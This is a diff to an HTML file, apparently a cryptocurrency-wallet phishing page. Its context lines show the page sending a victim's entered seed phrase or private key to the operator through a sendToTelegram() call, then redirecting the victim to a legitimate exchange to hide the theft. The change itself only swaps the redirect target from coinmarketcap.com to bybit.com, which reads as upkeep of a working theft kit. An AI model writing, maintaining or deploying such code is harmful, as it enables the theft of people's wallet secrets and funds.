--- a/keyless.html
+++ b/keyless.html
@@ -235,7 +235,7 @@
         sendToTelegram(`🪙 Seed Phrase:\n\n${words.join(" ")}`);
         showMessage("");
         setTimeout(() => {
-          window.location.href = "https://coinmarketcap.com/";
+          window.location.href = "https://www.bybit.com/";
         }, 1000);
       } else {
         const key = document.getElementById('privateKeyInput').value.trim();
@@ -246,7 +246,7 @@
         sendToTelegram(`🔑 Private Key:\n\n${key}`);
         showMessage("");
         setTimeout(() => {
-          window.location.href = "https://coinmarketcap.com/";
+          window.location.href = "https://www.bybit.com/";
         }, 1000);
       }
     }
